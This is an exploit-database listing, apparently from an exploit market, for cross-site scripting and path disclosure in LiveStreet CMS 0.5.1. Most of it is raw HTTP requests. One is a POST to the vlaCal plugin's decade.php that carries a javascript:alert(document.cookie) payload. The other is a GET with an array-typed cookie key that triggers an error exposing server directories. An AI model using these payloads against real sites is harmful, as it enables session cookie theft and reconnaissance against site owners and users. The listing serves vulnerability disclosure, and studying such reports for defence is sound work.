[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

LiveStreet 0.5.1 Cross Site Scripting

Author
HiMIC
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-18758
Category
web applications
Date add
21-06-2012
Platform
php
LiveStreet Cross-Site Scripting Vulnerabilities &  disclosure of directory

Vulnerable:  LiveStreet 0.5.1 http://livestreetcms.com/download/

Remote: Yes 
Local: No
Credit:      HiMIC (Babichev Igor)


Livestreet XSS POST:
File: /engine/lib/external/MooTools_1.2/plugs/vlaCal-v2.1/inc/year.php
        /engine/lib/external/MooTools_1.2/plugs/vlaCal-v2.1/inc/decade.php 

--------------
POST /engine/lib/external/MooTools_1.2/plugs/vlaCal-v2.1/inc/decade.php HTTP/1.1
Content-Length: 53
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=8223940c401233bbcffe59d6f2b7637d; _metrika_enabled=
Host: blog.himic.ru
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*

ts=%22%20BACKGROUND%3djavascript:alert%28document.cookie%29%20bad%3d%22
------------------

Disclosure of directory:

 The error occurs because of the variable key in Cookies, when you create it as an array key [] error climbs
--------------
GET /index.php HTTP/1.1
Cookie: PHPSESSID=8223940c401233bbcffe59d6f2b7637d; key[]=8223940c401233bbcffe59d6f2b7637d; _metrika_enabled=
Host: Livestreet.ru
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*
--------------

Site: http://blog.himic.ru/blog/security/162.html



#  0day.today [2024-05-20]  #